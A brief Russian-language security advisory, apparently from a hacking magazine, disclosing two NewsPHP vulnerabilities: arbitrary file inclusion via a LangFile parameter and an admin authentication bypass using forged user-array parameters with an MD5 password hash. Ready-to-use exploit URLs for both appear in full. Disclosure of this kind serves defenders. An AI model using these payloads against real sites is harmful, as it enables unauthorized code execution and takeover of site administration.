Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
NewsPHP - утилита для
публикации новостей посетителями сайта. В
программе обнаружено две уязвимости.
Первая - подключение и исполнение
произвольных файлов:
http://[host]/nphp/nphpd.php?nphp_config[LangFile]=/evil/file
Вторая - выполнение произвольных административных
функция без авторизации:
http://[host]/nphp/?[action here, example: output]&
pword=a&
uname=[fake usernamehere]&
nphp_users[user index here][0]=a&
nphp_users[user index here][1]=
0cc175b9c0f1b6a831c399e269772661&
nphp_users[user index here][3]=5
где md5('a') = '0cc175b9c0f1b6a831c399e269772661'